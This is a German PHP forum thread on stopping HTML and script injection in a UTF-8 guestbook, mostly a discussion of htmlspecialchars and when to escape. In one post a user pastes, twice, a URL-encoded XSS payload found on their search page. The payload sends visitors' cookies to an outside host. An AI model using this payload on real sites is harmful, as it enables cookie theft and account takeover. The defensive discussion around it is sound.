php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > Scripts > BRAINSTORMING PHP/SQL/HTML/JS/CSS
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


BRAINSTORMING PHP/SQL/HTML/JS/CSS Ihr habt eine Idee, aber keinen genauen Ansatz? Diskutiert mit anderen Usern des Forums über eure Gedankengänge um evtl. hilfreiche Ideen zu bekommen!
Normale Fragen bitte weiterhin in die entsprechenden Foren!

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 29-09-2005, 22:13
Stargast
 Newbie
Links : Onlinestatus : Stargast ist offline
Registriert seit: Apr 2003
Ort: Austria
Beiträge: 42
Stargast ist zur Zeit noch ein unbeschriebenes Blatt
Standard htmlentities in utf-8

Hallo,

wie kann ich verhindern, dass html in meinem Guestbook funktioniert. Früher hab ich htmlspecialchars() verwendet.

Jetzt basiert meine Webside aber auf utf-8 und darum möchte ich die htmlentities vermeiden.

Gibt es da eine andere Möglichkeit?
Mit Zitat antworten
  #2 (permalink)  
Alt 29-09-2005, 22:45
Abraxax
  THE REAL HAXE (Administrator)
Links : Onlinestatus : Abraxax ist offline
Registriert seit: Jul 2002
Ort: neuss.nrw.de
Beiträge: 22.623
Abraxax befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Früher hab ich htmlspecialchars() verwendet.
verwende es weiter. htmlentities() ist bei utf8 i.d.t. etwas sinnfrei. ;-)
__________________
INFO: Erst suchen, dann posten! | MANUAL(s): PHP | MySQL | HTML/JS/CSS | NICE: GNOME Do | TESTS: Gästebuch | IM: Jabber.org |


Mit Zitat antworten
  #3 (permalink)  
Alt 29-09-2005, 22:49
Stargast
 Newbie
Links : Onlinestatus : Stargast ist offline
Registriert seit: Apr 2003
Ort: Austria
Beiträge: 42
Stargast ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Ok, jetzt hab ich nur noch eine Frage:

Ist es besser diese Funktion beim Eintragen oder beim Auslesen der Daten zu verwenden. Zur Zeit verwende ich sie vor dem Eintragen.
Mit Zitat antworten
  #4 (permalink)  
Alt 29-09-2005, 22:50
Abraxax
  THE REAL HAXE (Administrator)
Links : Onlinestatus : Abraxax ist offline
Registriert seit: Jul 2002
Ort: neuss.nrw.de
Beiträge: 22.623
Abraxax befindet sich auf einem aufstrebenden Ast
Standard

ich mache sowas immer erst bei der ausgabe. ;-)

so habe ich auch die unveränderten daten in der db.
__________________
INFO: Erst suchen, dann posten! | MANUAL(s): PHP | MySQL | HTML/JS/CSS | NICE: GNOME Do | TESTS: Gästebuch | IM: Jabber.org |


Mit Zitat antworten
  #5 (permalink)  
Alt 29-09-2005, 23:28
Stargast
 Newbie
Links : Onlinestatus : Stargast ist offline
Registriert seit: Apr 2003
Ort: Austria
Beiträge: 42
Stargast ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Wie mach ich das dann bei den breaks?
Wenn ich die mit htmlspecialchars bearbeite, funktionieren sie nicht mehr so, wie sie sollten.
Mit Zitat antworten
  #6 (permalink)  
Alt 29-09-2005, 23:47
Benutzerbild von onemorenerd onemorenerd
  Moderator
Links : Onlinestatus : onemorenerd ist offline
Registriert seit: Mar 2005
Ort: Berlin
Beiträge: 9.471
onemorenerd wird schon bald berühmt werdenonemorenerd wird schon bald berühmt werden
Standard

Zitat:
Original geschrieben von Abraxax
ich mache sowas immer erst bei der ausgabe. ;-)

so habe ich auch die unveränderten daten in der db.
Kontra! Ich mache es bei der Eingabe, weil Daten i.d.R. einmalig geschrieben werden, aber mehrmals gelesen. Lieber ohne originale Eingabe leben, aber dafür schnellere Seiten - zumindest wenn relativ sicher ist, dass man die Daten nie (wieder) in ihrer Urform braucht.
Und eineindeutige Verarbeitungen auf jeden Fall vorm Speichern. Schließlich ließen sich die Urdaten wieder gewinnen.

Höre ich ein Re?
Mit Zitat antworten
  #7 (permalink)  
Alt 30-09-2005, 08:50
Abraxax
  THE REAL HAXE (Administrator)
Links : Onlinestatus : Abraxax ist offline
Registriert seit: Jul 2002
Ort: neuss.nrw.de
Beiträge: 22.623
Abraxax befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
zumindest wenn relativ sicher ist, dass man die Daten nie (wieder) in ihrer Urform braucht.
und genau das kann ich bei einem cms nicht ausschliessen!
__________________
INFO: Erst suchen, dann posten! | MANUAL(s): PHP | MySQL | HTML/JS/CSS | NICE: GNOME Do | TESTS: Gästebuch | IM: Jabber.org |


Mit Zitat antworten
  #8 (permalink)  
Alt 01-10-2005, 16:18
ghostgambler
 Master
Links : Onlinestatus : ghostgambler ist offline
Registriert seit: Jul 2004
Ort: DE - NRW
Beiträge: 4.620
ghostgambler ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Zitat:
Original geschrieben von Stargast
Wenn ich die mit htmlspecialchars bearbeite, funktionieren sie nicht mehr so, wie sie sollten.
das ist eine unglaubliche Fehlerbeschreibung -.-
Mit Zitat antworten
  #9 (permalink)  
Alt 01-10-2005, 22:23
AlphaWolf
 Newbie
Links : Onlinestatus : AlphaWolf ist offline
Registriert seit: Jan 2005
Beiträge: 18
AlphaWolf ist zur Zeit noch ein unbeschriebenes Blatt
Standard

PHP-Code:
$string htmlspecialchars($stringENT_QUOTES'UTF-8'); 
So sollte es funzen. Und die Kollation der Datenbank muss natürlich stimmen, falls du eine verwendest.
Mit Zitat antworten
  #10 (permalink)  
Alt 28-09-2006, 00:36
indy0130
 Newbie
Links : Onlinestatus : indy0130 ist offline
Registriert seit: May 2005
Beiträge: 65
indy0130 ist zur Zeit noch ein unbeschriebenes Blatt
Standard klappt bei mir nicht

Hi, ich hab auch so ein Problem mit den Zeichencodierungen und Html. Bei mir ist es möglich folgenden Code in dsa Skript einzugeben:

suchen.php?s=1&tag=a%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%5 3%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28104,116,116,112,58,47,47,114,119,46,100,10 1,118,97,103,101,110,116,115,46,100,101,47,110,117,114,47,106,97,99,107,46,112,104,112,63,106,97,99, 107,61)%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E&a=1&b=1">

Dadurch wird eine fremde Seite aufgerufen, die Cookies rausgeladen und schon fast ist der Böse mit dem Passwort von dem anderen online. Nach dem kurzen aufrufen der fremden Seite wird wieder zu meiner Seite weitergeleitet.

Was kann ich nun dagegen machen?

Hab folgendes probiert und es hat alles den Code so gelassen, wie er da steht:

$string = 'suchen.php?s=1&tag=a%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D% 53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28104,116,116,112,58,47,47,114,119,46,100,1 01,118,97,103,101,110,116,115,46,100,101,47,110,117,114,47,106,97,99,107,46,112,104,112,63,106,97,99 ,107,61)%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E&a=1&b=1">';

echo $string;

echo '<br /><br />';

echo htmlentities($string);

echo '<br /><br />';

echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8');

echo '<br /><br />';

echo strip_tags($string);

Danke...
Mit Zitat antworten
  #11 (permalink)  
Alt 28-09-2006, 10:48
ghostgambler
 Master
Links : Onlinestatus : ghostgambler ist offline
Registriert seit: Jul 2004
Ort: DE - NRW
Beiträge: 4.620
ghostgambler ist zur Zeit noch ein unbeschriebenes Blatt
Standard Re: klappt bei mir nicht

Was wird denn bei den echos ausgegeben? (Quellcode im Browser, nicht das was du im Browser siehst!)
Mit Zitat antworten
  #12 (permalink)  
Alt 28-09-2006, 11:45
indy0130
 Newbie
Links : Onlinestatus : indy0130 ist offline
Registriert seit: May 2005
Beiträge: 65
indy0130 ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Ich glaube, es war zu spät in der Nacht...er hat diesen komischen Zeichen am Ende doch ersetzt, oder? D.h. die Weiterleitung dürfte doch nicht mehr gehen?


EDIT:
Code entfernt - wir wollen hier nicht meterweit querscrollen müssen!
wahsaga


Geändert von wahsaga (28-09-2006 um 12:42 Uhr)
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

PHP Server Monitor

PHP Server Monitor ist ein Skript, das prüft, ob Ihre Websites und Server betriebsbereit sind.

11.09.2018 Berni | Kategorie: PHP/ Security
PHP WEB STATISTIK ansehen PHP WEB STATISTIK

Die PHP Web Statistik bietet Ihnen ein einfach zu konfigurierendes Script zur Aufzeichnung und grafischen und textuellen Auswertung der Besuchern Ihrer Webseite. Folgende zeitlichen Module sind verfügbar: Jahr, Monat, Tag, Wochentag, Stunde Folgende son

28.08.2018 phpwebstat | Kategorie: PHP/ Counter
Affilinator - Affilinet XML Produktlisten Skript

Die Affilinator Affilinet XML Edition ist ein vollautomatisches Skript zum einlesen und darstellen der Affili.net (Partnerprogramm Netzwerk) Produktlisten und Produktdaten. Im Grunde gibt der Webmaster seine Affilinet PartnerID ein und hat dann unmittelb

27.08.2018 freefrank@ | Kategorie: PHP/ Partnerprogramme
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 10:32 Uhr.